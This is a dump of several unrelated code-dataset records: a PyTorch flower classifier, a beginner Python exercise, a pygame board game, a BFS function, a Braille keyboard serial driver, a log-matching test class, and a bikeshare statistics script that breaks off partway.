print('Learning rate:', learning_rate)\r\n\r\n\r\n\r\n\r\n for epoch in range(epochs):\r\n\r\n print('Epoch {}/{}'.format(epoch, epochs - 1))\r\n print('-' * 10)\r\n\r\n\r\n for phase in ['train','valid']:\r\n if phase == 'train':\r\n scheduler.step()\r\n model.train()\r\n else:\r\n model.eval()\r\n running_loss = 0.0\r\n running_corrects = 0\r\n corrects = 0\r\n\r\n\r\n\r\n for inputs, labels in dataloaders[phase]:\r\n\r\n model.to(device)\r\n inputs = inputs.to(device)\r\n labels = labels.to(device)\r\n optimizer.zero_grad()\r\n\r\n with torch.set_grad_enabled(phase == 'train'):\r\n outputs = model(inputs)\r\n _, preds = torch.max(outputs, 1)\r\n loss = criterion(outputs, labels)\r\n\r\n\r\n if phase == 'train':\r\n loss.backward()\r\n optimizer.step()\r\n\r\n running_loss += loss.item() * inputs.size(0)\r\n running_corrects += torch.sum(preds == labels.data)\r\n\r\n\r\n epoch_loss = running_loss / dataset_sizes[phase]\r\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\r\n\r\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\r\n\r\n if phase == 'valid' and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n best_model_wts = copy.deepcopy(model.state_dict())\r\n\r\n\r\n print()\r\n time_elapsed = time.time() - since\r\n print('Training complete in {:.0f}m {:.0f}s'.format(\r\n time_elapsed // 60, time_elapsed % 60))\r\n print('Best val Acc: {:4f}'.format(best_acc))\r\n\r\n model.load_state_dict(best_model_wts)\r\n\r\n\r\n return model\r\n\r\n\r\n# In[4]:\r\n\r\n\r\ndef check_accuracy_on_test(testloader, checkpoint_path, loaded_model):\r\n correct = 0\r\n total = 0\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n model =loaded_model\r\n model.cuda()\r\n\r\n\r\n with torch.no_grad():\r\n for data in testloader:\r\n images, labels = data\r\n images= images.to(device)\r\n labels = labels.to(device)\r\n chpt = torch.load(checkpoint_path)\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n model.eval()\r\n outputs = model(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n total += labels.size(0)\r\n correct += (predicted == labels).sum().item()\r\n\r\n print('Accuracy of the network on the test images: %d %%' % (100 * correct / total))\r\n\r\n\r\n# In[5]:\r\n\r\n\r\ndef process_image(image_test):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array'''\r\n img_loader = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor()])\r\n\r\n pil_image = Image.open(image_test)\r\n pil_image = img_loader(pil_image).float()\r\n\r\n tensor_image = np.array(pil_image)\r\n\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n tensor_image = (np.transpose(tensor_image, (1, 2, 0)) - mean)/std\r\n tensor_image = np.transpose(tensor_image, (2, 0, 1))\r\n\r\n\r\n return tensor_image\r\n\r\n\r\n# In[6]:\r\n\r\n\r\n\r\ndef imshow(image, ax=None, title=None):\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if title:\r\n plt.title(title)\r\n # PyTorch tensors assume the color channel is first\r\n # but matplotlib assumes is the third dimension\r\n image = image.transpose((1, 2, 0))\r\n\r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = std * image + mean\r\n\r\n # Image needs to be clipped between 0 and 1\r\n image = np.clip(image, 0, 1)\r\n\r\n ax.imshow(image)\r\n\r\n return ax\r\n\r\n# In[7]:\r\n\r\n\r\ndef predict(image_test,model,checkpoint_path, topk = 5):\r\n\r\n\r\n\r\n image = process_image(image_test)\r\n image_tensor = torch.from_numpy(image).type(torch.FloatTensor)\r\n input= image_tensor.unsqueeze(0)\r\n\r\n\r\n\r\n chpt = torch.load(checkpoint_path)\r\n\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n model.cpu()\r\n model.eval()\r\n probs = torch.exp(model.forward(input))\r\n top_probs, top_labs = probs.topk(topk)\r\n top_probs = top_probs.detach().numpy().tolist()[0]\r\n top_labs = top_labs.detach().numpy().tolist()[0]\r\n\r\n idx_to_class = {val: key for key, val in model.class_to_idx.items()}\r\n\r\n top_labels = [idx_to_class[lab] for lab in top_labs]\r\n top_flowers = [cat_to_name[idx_to_class[lab]] for lab in top_labs]\r\n return top_probs, top_labels, top_flowers\r\n\r\n\r\n\r\n# In[8]:\r\n\r\n\r\n\r\ndef sanity_check(image_test):\r\n img = mpimg.imread(image_test)\r\n plt.rcdefaults()\r\n plt.figure(figsize = (6,10))\r\n ax = plt.subplot(2,1,1)\r\n flower_num = image_test.split('\\\\')[6]\r\n title_ = cat_to_name[flower_num]\r\n img = process_image(image_test)\r\n imshow(img, ax, title = title_)\r\n\r\n probs, labs, flowers= predict(image_test, loaded_model,checkpoint_path, topk=5)\r\n\r\n\r\n\r\n plt.subplot(2,1,2)\r\n sns.barplot(x=probs, y=flowers, color=sns.color_palette()[0]);\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\r\n image_path = \"C://Users//Sahan//ipthw//flowers\"\r\n\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n print(device)\r\n\r\n\r\n\r\n with open('C:\\\\Users\\\\sahan\\\\ipthw\\\\cat_to_name.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n\r\n data_transforms = {\r\n 'train': transforms.Compose([\r\n transforms.RandomRotation(45),\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ]),\r\n 'valid': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ]),\r\n 'test': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])}\r\n\r\n\r\n\r\n image_datasets = {x: datasets.ImageFolder(os.path.join(image_path, x),data_transforms[x]) for x in ['train', 'valid','test']}\r\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=1,shuffle=True, num_workers=0) for x in ['train', 'valid','test']}\r\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid','test']}\r\n class_names = image_datasets['train'].classes\r\n\r\n\r\n\r\n arch = 'Densenet-161'\r\n\r\n epochs=25\r\n learning_rate =0.001\r\n\r\n\r\n checkpoint_path = 'Densenet-161(test15).pth.tar'\r\n loaded_model =load_model(checkpoint_path, arch , num_classes=102)\r\n\r\n trained_model =train_model(loaded_model, epochs, learning_rate, device, image_path)\r\n\r\n trained_model.class_to_idx = image_datasets['train'].class_to_idx\r\n checkpoint = {\r\n 'arch': arch,\r\n 'class_to_idx': trained_model.class_to_idx,\r\n 'state_dict': trained_model.state_dict(),\r\n 'hidden_units':1000}\r\n\r\n torch.save(checkpoint, 'Densenet-161(test16).pth.tar')\r\n checkpoint_path = 'Densenet-161(Test16).pth.tar'\r\n image_test = 'C:\\\\Users\\\\sahan\\\\ipthw\\\\flowers\\\\train\\\\10\\\\image_07087.jpg'\r\n\r\n check_accuracy_on_test(dataloaders['test'], checkpoint_path,loaded_model)\r\n\r\n top_probs, top_labels, top_flowers =predict(image_test,loaded_model, checkpoint_path, topk=5)\r\n sanity_check(image_test)\r\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302188108","text":"'''\r\nCreated on 21 mar. 2020\r\n\r\n@author: Sidney\r\n\r\nEscribir un programa que pida al usuario una palabra y luego muestre\r\npor pantalla una a una las letras de la palabra introducida empezando\r\npor la última.\r\n\r\nhttp://aprendeconalf.es/python/ejercicios/bucles.html\r\n\r\n'''\r\n\r\na = input(\"Introduce una palabra: \")\r\n\r\nfor i in reversed(a):\r\n print(i)","sub_path":"ejerciciosALF_bucles/main10.py","file_name":"main10.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241316926","text":"from enum import Enum\nfrom os import system\nfrom threading import Thread\nimport numpy as np\nimport pygame, time\nfrom pygame.locals import *\npygame.init()\n\nclass Mode(Enum):\n Select = 1\n Rotate = 2\n Solve = 3\n\nclass User(Enum):\n Null = 0\n PC1 = 1\n PC2 = 2\n\nSOLVER = \"solvers/hashsolver.o\"\n\ndef draw():\n disp.fill((0,150,255))\n pygame.draw.line(disp, (0,0,0), (W//2,0), (W//2,W), 5)\n pygame.draw.line(disp, (0,0,0), (0,W//2), (W,W//2), 5)\n for i in range(6):\n for j in range(6):\n q = board[i,j]\n pygame.draw.circle(disp, cmap[q], (ax[i],ay[j]), r)\n\ndef rotdraw():\n w, h = rimg.get_size()\n for i in range(2):\n for j in range(2):\n x1 = rx[i*2]\n x2 = rx[i*2+1]\n y = ry[j]\n disp.blit(limg, (x1-w//2,y-h//2))\n disp.blit(rimg, (x2-w//2,y-h//2))\n\ndef getcell(xm, ym):\n dx = (ax - xm)**2\n dy = (ay - ym)**2\n for i in range(6):\n for j in range(6):\n if dx[i] + dy[j] <= r**2 and board[i,j] == User.Null:\n return i,j\n return None\n\ndef getrot(xm, ym):\n w, h = rimg.get_size()\n for i in range(2):\n for j in range(2):\n x1 = rx[i*2]\n x2 = rx[i*2+1]\n y = ry[j]\n if y-h//2 <= ym <= y+h//2:\n if x1-w//2 <= xm <= x1+w//2:\n return i,j,+1\n if x2-w//2 <= xm <= x2+w//2:\n return i,j,-1\n return None\n\ndef solve(cur):\n global board, points, last\n\n cp = np.zeros((6, 6), dtype=str)\n cp[board==User.Null] = '_'\n if cur == User.PC1:\n cp[board==User.PC1] = 'X'\n cp[board==User.PC2] = 'O'\n else:\n cp[board==User.PC2] = 'X'\n cp[board==User.PC1] = 'O'\n np.savetxt(\"log/in.txt\", cp, fmt = '%s', delimiter=' ')\n\n cmd = \"./\" + SOLVER + \"< ./log/in.txt > ./log/out.txt\"\n system(cmd)\n\n file = open(\"log/out.txt\", \"r\")\n data = file.readlines()\n points = list(map(int, data[0].split()))\n for i in range(1, 7):\n cp = np.array(data[i].split(), dtype=str)\n board[i-1, cp=='_'] = User.Null\n if cur == User.PC1:\n board[i-1, cp=='X'] = User.PC1\n board[i-1, cp=='O'] = User.PC2\n else:\n board[i-1, cp=='X'] = User.PC2\n board[i-1, cp=='O'] = User.PC1\n return\n\ndef wait():\n pygame.draw.circle(disp, (255,0,0), (W//2, W//2), 50)\n pygame.display.update()\n time.sleep(1)\n\ncmap = {User.Null : (0,0,200),\n User.PC1 : (255,255,255),\n User.PC2: (0,0,0)}\n\nW = 600\nr = 30\nrimg = pygame.image.load(\"img/iright.png\")\nlimg = pygame.image.load(\"img/ileft.png\")\ndisp = pygame.display.set_mode((W, W))\nfont = pygame.font.Font(None, 128)\nclock = pygame.time.Clock()\n\nboard = np.zeros((6,6), dtype=User)\nboard[:][:] = User.Null\nlast = None\nax = np.linspace(0, W, 13, dtype=np.int32)[1:-1:2]\nay = np.linspace(0, W, 13, dtype=np.int32)[1:-1:2]\nrx = np.linspace(0, W, 7, dtype=np.int32)[[1,2,4,5]]\nry = np.linspace(0, W, 5, dtype=np.int32)[[1,3]]\n\ndraw()\npygame.display.update()\n\nnow = Mode.Solve\ncurrent = User.PC1\npoints = [0, 0, 0]\nrunning = True\n\nwhile running:\n if sum(points) > 0:\n running = False\n break\n\n for e in pygame.event.get():\n if e.type == QUIT:\n running = False\n\n if e.type == MOUSEMOTION and now == Mode.Select:\n xm, ym = e.pos\n ind = getcell(xm, ym)\n if ind is not None:\n i, j = ind\n pygame.draw.circle(disp, cmap[current], (ax[i], ay[j]), r)\n else:\n draw()\n\n if e.type == MOUSEBUTTONDOWN and now == Mode.Select:\n xm, ym = e.pos\n ind = getcell(xm, ym)\n if ind is not None:\n last = board.copy()\n i, j = ind\n board[i, j] = User.Human\n now = Mode.Rotate\n rotdraw()\n break\n\n if e.type == MOUSEBUTTONDOWN and now == Mode.Rotate:\n xm, ym = e.pos\n ind = getrot(xm, ym)\n if ind is not None:\n i, j, k = ind\n pl = i + j*2\n q = board[i*3:(i+1)*3, j*3:(j+1)*3]\n q[:] = np.rot90(q, -k)\n now = Mode.Solve\n current = User.PC\n draw()\n\n if e.type == KEYDOWN:\n if e.key == K_z and last is not None:\n board[:] = last\n\n pygame.display.update()\n\n if current != User.Null and now == Mode.Solve:\n thr = Thread(target=solve, args=(current,))\n thr.start()\n wait()\n thr.join()\n if current == User.PC1:\n current = User.PC2\n else:\n current = User.PC1\n now = Mode.Solve\n draw()\n\n pygame.display.update()\n\n clock.tick(60)\n\ntext = 'null'\nprint(points)\nif (points[0] == points[1] and points[0] != 0) or points[2] == 1:\n text = \"draw\"\nelif points[0] > points[1]:\n text = \"PC1 wins\"\nelif points[1] > points[0]:\n text = \"PC2 wins\"\nelse:\n text = \"Press again\"\n\nbox = font.render(text, True, (255,128,0))\nwb, hb = box.get_size()\ndisp.blit(box, ((W-wb)//2, (W-hb)//2))\npygame.display.update()\nprint(\"End of Game, Press Quit Button!\")\n\nwhile True:\n for e in pygame.event.get():\n if e.type == QUIT:\n pygame.quit()\n","sub_path":"pc2pc.py","file_name":"pc2pc.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522859158","text":"\ntest_graph = {1: set([2,3]),\n 2: set([4,5,6]),\n 3: set([7]),\n 4: set([1]),\n 5: set([2,5]),\n 6: set([8]),\n 7: set([3]),\n 8: set([2,3])\n }\n\ndef bfs_iteration(graph, root):\n visited = []\n queue = [root]\n while queue:\n now = queue.pop(0)\n if now not in visited:\n visited.append(now)\n queue.extend(graph[now])\n return visited","sub_path":"basic_code/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92351960","text":"import time\nimport serial\nimport serial.tools.list_ports\nimport struct\n\nclass keyboard:\n \"\"\" Object that communicates between the\n braillecade keyboard and the computer.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n self.Ser: serial object?\n\n self.last_button_state:\n\n self.last_chord:\n\n self.last_letter:\n \"\"\"\n\n self.ser = None\n\n\n self.standard = None\n self.raw = None\n self.chord = None\n self.letter = None\n self.cursor_key = None\n self.cursor_key_list = None\n self.card_state = None\n self.card_trigger = None\n self.card_str = ' '\n self.card_ID = None\n \n\n self.last_chord = None\n\n self.last_letter = None\n\n self.comport = None\n \n \n self.chord_to_letter = {\n '000001': 'a',\n '000011': 'b',\n '001001': 'c',\n '011001': 'd',\n '010001': 'e',\n '001011': 'f',\n '011011': 'g',\n '010011': 'h',\n '001010': 'i',\n '011010': 'j',\n '000101': 'k',\n '000111': 'l', \n '001101': 'm',\n '011101': 'n',\n '010101': 'o',\n '001111': 'p',\n '011111': 'q',\n '010111': 'r',\n '001110': 's',\n '011110': 't',\n '100101': 'u',\n '100111': 'v',\n '111010': 'w',\n '101101': 'x',\n '111101': 'y',\n '110101': 'z',\n '000000': None,\n }\n\n self.letter_to_chord = {\n 'a':'000001',\n 'b':'000011', \n 'c':'001001',\n 'd':'011001',\n 'e':'010001',\n 'f':'001011',\n 'g':'011011',\n 'h':'010011',\n 'i':'001010',\n 'j':'011010',\n 'k':'000101',\n 'l':'000111',\n 'm':'001101',\n 'n':'011101',\n 'o':'010101',\n 'p':'001111',\n 'q':'011111',\n 'r':'010111',\n 's':'001110',\n 't':'011110',\n 'u':'100101',\n 'v':'100111',\n 'w':'111010',\n 'x':'101101',\n 'y':'111101',\n 'z':'110101',\n 'space':'000000',\n }\n\n self.chord_to_key = {\n '000001': 'key1',\n '000010': 'key2',\n '000100': 'key3',\n '001000': 'key4',\n '010000': 'key5',\n '100000': 'key6',\n }\n\n self.key_to_chord = {\n 'key1':'000001',\n 'key2':'000010',\n 'key3':'000100',\n 'key4':'001000',\n 'key5':'010000',\n 'key6':'100000',\n }\n\n \n def list_coms(self):\n \"\"\" Returns a list of communication ports available\n \"\"\"\n \n comports = list(serial.tools.list_ports.comports())\n\n port_numbers = []\n\n for port_no, description, address in comports:\n port_numbers.append(port_no)\n \n return port_numbers\n\n\n def test_coms(self):\n \"\"\"\n \"\"\"\n\n port_numbers = self.list_coms()\n\n if len(port_numbers) > 0:\n for port in port_numbers: # don't use i\n print(\"testing {}\".format(port)) \n self.ser = serial.Serial(port,baudrate=9600,timeout=0)\n time.sleep(.5)\n self.ser.write(b\"i\")\n time.sleep(.5)\n out = ''\n \n while self.ser.inWaiting() > 0:\n out += self.ser.read(1).decode('utf-8')\n\n if out != '':\n print(\">>{}\".format(out))\n\n if out == 'BrailleCade':\n print('Braillecade Found')\n self.com_port = port\n break # does this need to be a return\n\n self.ser.close\n\n print(\"No comports found\")\n\n\n def update_keyboard(self):\n \"\"\"\n \"\"\"\n\n self.ser.write(b'b')\n time.sleep(.1)\n\n if self.ser.inWaiting() > 0:\n\n self.raw = format(int.from_bytes(self.ser.readline(),'little'),'032b')\n\n self.card_trigger = False\n\n if self.raw == '11111111111111111111111111111111':\n\n self.request_card()\n self.card_trigger = True\n \n self.raw = '00000000000000000000000000000000'\n\n if self.raw == '10101010101010101010101010101010':\n self.card_state = False\n self.card_str = ' '\n self.card_ID = None\n\n self.raw = '00000000000000000000000000000000'\n\n\n self.chord = self.raw[2:8]\n self.letter = self.get_letter(self.chord)\n self.key = self.get_key(self.chord)\n\n try:\n self.cursor_key = 19 - self.raw[12:32].index('1')\n except:\n self.cursor_key = None\n\n self.cursor_keys_list = [(19 - pos) for pos,char in enumerate(self.raw[12:32]) if char == '1']\n\n\n if ((self.raw[0] == '1') & (self.raw[1] == '1') & (self.raw[8] == '1')):\n self.standard = 'quit'\n elif self.raw[8] == '1':\n self.standard = 'space'\n self.letter = 'space' # is this right? space is higher priority than a letter?\n elif ((self.raw[0] == '1') & (self.raw[1] == '1')):\n self.standard = 'display'\n elif (self.raw[0] == '1'):\n self.standard = 'newline'\n elif (self.raw[1] == '1'):\n self.standard = 'backspace'\n elif self.letter:\n self.standard = self.letter\n elif self.cursor_key:\n self.standard = self.cursor_key\n else:\n self.standard = None\n\n return {\n 'raw':self.raw,\n 'card_trigger':self.card_trigger,\n 'chord':self.chord,\n 'letter':self.letter,\n 'cursor_key':self.cursor_key,\n 'cursor_keys_list':self.cursor_keys_list,\n 'standard':self.standard,\n 'card_state':self.card_state,\n 'card_str':self.card_str,\n 'key':self.key,\n 'card_ID':self.card_ID\n }\n\n\n def get_letter(self, chord):\n \n return self.chord_to_letter.get(chord, 'error')\n\n def get_key(self, chord):\n\n return self.chord_to_key.get(chord, None)\n\n\n def request_card(self):\n \"\"\" Sends a request to the keyboard for the data on the card.\n Returns this data in the form of an string.\n \"\"\"\n \n self.ser.write(b'c')\n time.sleep(.1)\n \n temp_string = self.ser.readline().decode('ascii')\n self.card_str = temp_string[1:-2]\n self.card_ID = temp_string[0]\n\n print(self.card_str)\n\n self.card_state = True\n \n return(self.card_str)\n\n\n def vibrate_single_key(self, vib):\n\n counter = 0\n\n for digit in self.key_to_chord[vib][::-1]: # switch order of string since MSB ans LSB are switching when reading left to right.\n if digit == '1':\n vib = pow(2, counter)\n self._vibrate_key(vib)\n print(vib)\n time.sleep(.01)\n self.ser.reset_input_buffer() \n counter += 1\n\n\n def _vibrate_key(self, vib, sleep_time=0.05):\n \"\"\" \n \"\"\"\n \n self.ser.write(b'v')\n self.ser.write(str(vib).encode('ascii'))\n self.ser.write(b'\\r')\n \n time.sleep(sleep_time)\n\n self.ser.write(b'v')\n self.ser.write(b'0')\n self.ser.write(b'\\r')\n\n\n def vibrate_letter(self, letter, sim=False):\n \"\"\"\n \"\"\"\n \n counter = 0\n\n if sim:\n value = 0 \n for key in self.letter_to_chord[letter][::-1]: # switch order of string since MSB ans LSB are switching when reading left to right.\n if key == '1':\n vib = pow(2, counter)\n value = value + vib\n counter += 1\n \n self._vibrate_key(value)\n\n else:\n for key in self.letter_to_chord[letter][::-1]: # switch order of string since MSB ans LSB are switching when reading left to right.\n if key == '1':\n vib = pow(2, counter)\n self._vibrate_key(vib)\n print(vib)\n time.sleep(.05)\n self.ser.reset_input_buffer() \n counter += 1\n \n\n def vibrate_chord(self, chord, sim=False):\n \"\"\"\n \"\"\"\n \n counter = 0\n\n if sim:\n value = 0 \n for key in chord[::-1]: # switch order of string since MSB ans LSB are switching when reading left to right.\n if key == '1':\n vib = pow(2, counter)\n value = value + vib\n counter += 1\n \n self._vibrate_key(value)\n\n else:\n for key in chord[::-1]: # switch order of string since MSB ans LSB are switching when reading left to right.\n if key == '1':\n vib = pow(2, counter)\n self._vibrate_key(vib)\n print(vib)\n time.sleep(.05)\n self.ser.reset_input_buffer() \n counter += 1\n\n","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":9639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164412568","text":"\"\"\"\n\"\"\"\nimport pprint\nimport re\n\ntry:\n from stage_check import Output\nexcept ImportError:\n import Output\n\ntry:\n from stage_check import EntryTester\nexcept ImportError:\n import EntryTester\n\ntry:\n from stage_check import AbstractTest\nexcept ImportError:\n import AbstractTest\n\ntry:\n from stage_check import Linux\nexcept ImportError:\n import Linux\n\n\ndef create_instance(test_id, config, args):\n \"\"\"\n Invoked by TestExecutor class to create a test instance\n \n @test_id - test index number\n @config - test parameters from configuration \n @args - command line args\n \"\"\"\n return TestLogs(test_id, config, args)\n\n\nclass TestLogs(AbstractTest.Linux, EntryTester.MatchFunction):\n \"\"\"\n Tests to see if the requested device pattern matches in the \n global namespace and/or the specified namespaces(s)\n \"\"\"\n def __init__(self, test_id, config, args):\n super().__init__(test_id, config, args)\n self.results = []\n\n def get_params(self):\n # apply defaults\n default_params = {\n \"node_type\" : \"primary\",\n \"log_path\" : \"\",\n \"log_glob\" : \"\",\n \"past_hours\" : 0,\n \"extra_granularity\" : False,\n \"excludes\" : [],\n \"patterns\" : [],\n \"result\" : {}\n }\n \n params = self.apply_default_params(default_params)\n return params\n\n def run(self, local_info, router_context, gql_token, fp):\n \"\"\"\n \"\"\"\n test_info = self.test_info(local_info, router_context)\n self.output.test_start(test_info, status=Output.Status.OK)\n params = self.get_params()\n\n if self.check_user() != Output.Status.OK:\n return self.output.test_end(fp)\n\n self.output.progress_start(fp)\n router_context.query_node_info()\n\n uptime_data = {}\n service_data = {}\n cores_data = []\n\n # Ugly....\n self.fp = fp\n error_lines = []\n logs_since_data = []\n logs_since = Linux.LogFilesSince(self.debug, progobj=self)\n shell_status = logs_since.run_linux_args(\n router_context, \n params['node_type'], \n params['log_path'],\n params['log_glob'],\n params['past_hours'],\n error_lines,\n logs_since_data\n )\n\n if len(error_lines) > 0:\n # Ugly...\n self.fp = None\n self.output.proc_run_linux_error(shell_status, error_lines[0])\n return self.output.test_end(fp)\n\n if self.debug:\n print('........ logs_since_data ..........')\n pprint.pprint(logs_since_data)\n\n file_list = []\n for entry in logs_since_data:\n file_list.append(entry[\"file\"])\n\n include_patterns = []\n for entry in params[\"patterns\"]:\n include_patterns.append(entry[\"regex\"])\n exclude_patterns = []\n for entry in params[\"excludes\"]:\n exclude_patterns.append(entry)\n\n match_data = {}\n error_lines = []\n log_matches = Linux.LogFileMatches(\n self.debug, \n progobj=self, \n past_hours=params['past_hours'],\n extra_granularity=params['extra_granularity']\n )\n shell_status = log_matches.run_linux_args(\n router_context, \n params['node_type'], \n params['log_path'],\n file_list,\n include_patterns,\n exclude_patterns,\n error_lines,\n match_data\n )\n\n if len(error_lines) > 0:\n # Ugly...\n self.fp = None\n self.output.proc_run_linux_error(shell_status, error_lines[0])\n return self.output.test_end(fp)\n\n if self.debug:\n print('........ match_data flattened list ..........')\n pprint.pprint(match_data)\n\n # process json data\n match_data[\"total_patterns\"] = 0\n if \"patterns\" in params:\n match_data[\"total_patterns\"] = len(params[\"patterns\"])\n for match in match_data[\"matches\"]:\n for key in match_data:\n if key == \"matches\":\n continue\n match[key] = match_data[key]\n match[\"past_hours\"] = params[\"past_hours\"]\n self.output.proc_pattern_matched(params, match)\n\n self.output.proc_test_result(params, match_data)\n self.output.test_end(fp)\n","sub_path":"stage_check/stage_check/TestLogs.py","file_name":"TestLogs.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153418114","text":"import time\nimport pandas as pd\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n\n \"\"\"\n\n ## get user input for city.\n ## prevent/reduce user input errors (Newyork or New York or New York City) by requesting only one letter for the city\n\n print (\"\\nWhich city's statistics would you like to see?\")\n while True:\n city = input(\"Choose a city by entering a letter.\\nc for Chicago or n - New york or w - Washington:\").lower()\n if city not in (\"c\",\"n\",\"w\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n ## converting input to full city name to keep the values returned by this function named properly. CITY_DATA dictionary's keys were not changed to a letter to keep code readable. \n if city == \"c\":\n city = \"chicago\"\n elif city == \"n\":\n city = \"new york city\"\n else:\n city = \"washington\"\n\n print('*'*40)\n\n ## get user input for month and day filters\n ## prevent/reduce user input error by requesting only a number\n\n print(\"\\nWould you like to include all months or filter data for one specific month?\")\n while True:\n month = input(\"Enter a digit from 0 to 6 corresponding to:\\n0-include all months\\n1-January\\n2-February\\n3-March\\n4-April\\n5-May\\n6-June\\n:\")\n if month not in (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n print('*'*40)\n\n\n print(\"\\nWould you like to include all days of week or filter for one specific day?\")\n while True:\n day = input(\"Enter a digit from 0 to 7 corresponding to:\\n0-include all days\\n1-Monday\\n2-Tuesday\\n3-Wednesday\\n4-Thursday\\n5-Friday\\n6-Saturday\\n7-Sunday\\n:\")\n if day not in (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n #convert type of inputs from str to int\n month = int(month)\n day = int(day)\n\n # print(\"City= \",city)\n # print(\"Month= \",month)\n # print(\"Day= \",day) \n\n print('*'*50)\n\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.dayofweek\n df['hour'] = df['Start Time'].dt.hour\n \n # filter by month if applicable\n if month != 0:\n df = df[(df.month == month)]\n \n # filter by day of week if applicable\n if day != 0:\n df = df[df['day_of_week'] == day]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nThe Most Frequent Times of Travel:\\n')\n start_time = time.time()\n\n # display the most common month\n print(\"The most common month is:\",df[\"month\"].mode()[0])\n \n # display the most common day of week\n print(\"The most common day of week is:\",df[\"day_of_week\"].mode()[0])\n \n # display the most common start hour\n print(\"The most common hour is:\",df[\"hour\"].mode()[0])\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nThe Most Popular Stations and Trip:\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print(\"The most commonly used starting station is:\\n\",df[\"Start Station\"].mode()[0])\n # display most commonly used end station\n print(\"The most commonly used ending station is:\\n\", df[\"End Station\"].mode()[0])\n # display most frequent combination of start station and end station trip\n print(\"The most frequent combination of start station and end station is:\\n\", (df[\"Start Station\"] + ' AND ' + df[\"End Station\"]).mode()[0])\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nTrip Duration Statistics:\\n')\n start_time = time.time()\n\n # display total travel time\n print(\"The total travel time in minutes is:\",df[\"Trip Duration\"].sum())\n\n # display mean travel time\n print(\"The mean travel time in minutes is:\",df[\"Trip Duration\"].mean())\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on 